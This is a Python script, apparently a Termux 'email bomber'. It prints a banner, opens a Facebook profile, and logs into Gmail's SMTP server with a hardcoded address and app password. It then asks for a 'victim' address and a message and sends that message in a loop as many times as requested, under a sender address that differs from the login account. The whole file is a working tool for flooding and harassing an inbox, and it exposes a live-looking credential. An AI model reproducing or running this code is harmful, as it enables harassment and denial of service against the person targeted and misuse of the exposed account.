import smtplib,os
os.system("clear")
os.system("xdg-open https://www.facebook.com/profile.php?id=100077855090738/")
logo3=("""

\x1b[1;94m ███████ ███    ███ ██ ██            ███████ ███    ███ ███████ 
\x1b[1;94m ██      ████  ████ ██ ██            ██      ████  ████ ██      
\x1b[1;94m █████   ██ ████ ██ ██ ██      █████ ███████ ██ ████ ██ ███████ 
\x1b[1;94m ██      ██  ██  ██ ██ ██                 ██ ██  ██  ██      ██ 
\x1b[1;94m ███████ ██      ██ ██ ███████       ███████ ██      ██ ███████ 
                                                                                                                                                        
  \033[1;92m███████ ███████ ███    ██  █████  ██    ██ ███████ ██
  \033[1;92m██      ██      ████   ██ ██   ██  ██  ██  ██      ██      
  \033[1;92m███████ █████   ██ ██  ██ ███████   ████   █████   ██      
  \033[1;92m     ██ ██      ██  ██ ██ ██   ██    ██    ██      ██      
  \033[1;92m███████ ███████ ██   ████ ██   ██    ██    ███████ ███████ 
         
 \033[1;93m×××××××××××××××××\033[1;93m××××××××××××××\033[1;93m××××××××××××××××××
 \033[1;93m|     \033[1;96m[✓] CREATED BY\33[0;m   :  \033[1;96mSENAYEL ISLAM (DIP)   \033[1;93m|
 \033[1;93m|     \033[1;32m[✓] FACEBOK      : \033[1;34m SENAYE ISLAM		 \033[1;93m|
 \033[1;93m|     \033[1;35m[✓] GITHUB       :  \033[1;35mMAGIC-DIP..           \033[1;93m|
 \033[1;93m|     \033[1;36m[✓] TOOL STATUS  : \033[1;36m BD EMAIL  BOOMBER     \033[1;93m|
 \033[1;93m|     \033[1;35m[✓] TEAM         :  \033[1;35mKGF                   \033[1;93m|
 \033[1;93m|     \033[1;36m[✓] TOOL VIRSION :  \033[1;36mMAX                   \033[1;93m|
 \033[1;93m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;93m×××××××××××××××××
 \033[1;91m[\033[1;97m•\033[1;91m]\033[1;32m PLZ SAPPORT ME BRO....
 \033[1;91m[\033[1;97m•\033[1;91m]\033[1;32m DIP TERMUX HELPING ZONE....
 \033[1;93m××××××××××××××××\033[1;93m×××××××××××××××\033[1;93m××××××××××××××××××
 \033[1;93m×××××××××××××××××\033[1;93m××××××××××××××\033[1;93m××××××××××××××××××××××××××
 \033[1;93m|\033[1;32★ TOOLS IS FREE SHARE IT TO YOUR FRIENDS		 \033[1;93m|                 
 \033[1;93m|\033[1;31mBUT DONT USE IT FOR ILLEGAL WORK .. ENJOY ツ\033[1;33m    	 \033[1;93m|                     
 \033[1;93m×××××××××××××××××\033[1;93m××××××××××××××\033[1;93m××××××××××××××××××××××××××
""")
print(logo3)
bom=smtplib.SMTP("smtp.gmail.com","25")
bom.ehlo()
bom.starttls()

bom.login("senayelislamdipdip3@gmail.com","iemrkdzadfdqkvij")

victim=input("\n  [_>] VICTIMS MAIL : ")
msg=input("\n  [_>] YOUR MASSAGE : ")
limit=int(input("\n  [_>] AMOUNT : "))
os.system("clear")
print("""

\x1b[1;94m ███████ ███    ███ ██ ██            ███████ ███    ███ ███████ 
\x1b[1;94m ██      ████  ████ ██ ██            ██      ████  ████ ██      
\x1b[1;94m █████   ██ ████ ██ ██ ██      █████ ███████ ██ ████ ██ ███████ 
\x1b[1;94m ██      ██  ██  ██ ██ ██                 ██ ██  ██  ██      ██ 
\x1b[1;94m ███████ ██      ██ ██ ███████       ███████ ██      ██ ███████ 
                                                                                                                                                        
  \033[1;92m███████ ███████ ███    ██  █████  ██    ██ ███████ ██
  \033[1;92m██      ██      ████   ██ ██   ██  ██  ██  ██      ██      
  \033[1;92m███████ █████   ██ ██  ██ ███████   ████   █████   ██      
  \033[1;92m     ██ ██      ██  ██ ██ ██   ██    ██    ██      ██      
  \033[1;92m███████ ███████ ██   ████ ██   ██    ██    ███████ ███████ 
         
 \033[1;93m×××××××××××××××××\033[1;93m××××××××××××××\033[1;93m××××××××××××××××××
 \033[1;93m|     \033[1;96m[✓] CREATED BY\33[0;m   :  \033[1;96mSENAYEL ISLAM (DIP)   \033[1;93m|
 \033[1;93m|     \033[1;32m[✓] FACEBOK      : \033[1;34m SENAYE ISLAM		 \033[1;93m|
 \033[1;93m|     \033[1;35m[✓] GITHUB       :  \033[1;35mMAGIC-DIP..           \033[1;93m|
 \033[1;93m|     \033[1;36m[✓] TOOL STATUS  : \033[1;36m BD EMAIL  BOOMBER     \033[1;93m|
 \033[1;93m|     \033[1;35m[✓] TEAM         :  \033[1;35mKGF                   \033[1;93m|
 \033[1;93m|     \033[1;36m[✓] TOOL VIRSION :  \033[1;36mMAX                   \033[1;93m|
 \033[1;93m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;93m×××××××××××××××××
 \033[1;91m[\033[1;97m•\033[1;91m]\033[1;32m PLZ SAPPORT ME BRO....
 \033[1;91m[\033[1;97m•\033[1;91m]\033[1;32m DIP TERMUX HELPING ZONE....
 \033[1;93m××××××××××××××××\033[1;93m×××××××××××××××\033[1;93m××××××××××××××××××
 \033[1;93m×××××××××××××××××\033[1;93m××××××××××××××\033[1;93m××
 \033[1;93m|\033[1;32m[\033[1;37m+\033[1;32m]\033[1;96m YOUR PROCESS IS STARTED √  \033[1;93m|              
 \033[1;93m|\033[1;32m[\033[1;37m+\033[1;32m] \033[1;35m JUST WAIT A FEW SECOND    \033[1;93m|                     
 \033[1;93m×××××××××××××××××\033[1;93m××××××××××××××\033[1;93m××
""")
for i in range(limit):
  bom.sendmail("rxalvi179@gmail.com",victim,msg)
  print("\n ["+str(i+1)+"] MAIL SENT ✅")
print("   \n\033[1;32m[\033[1;37m+\033[1;32m] ALL MAIL WAS SENT SUCCESSFULLY ✅ ")
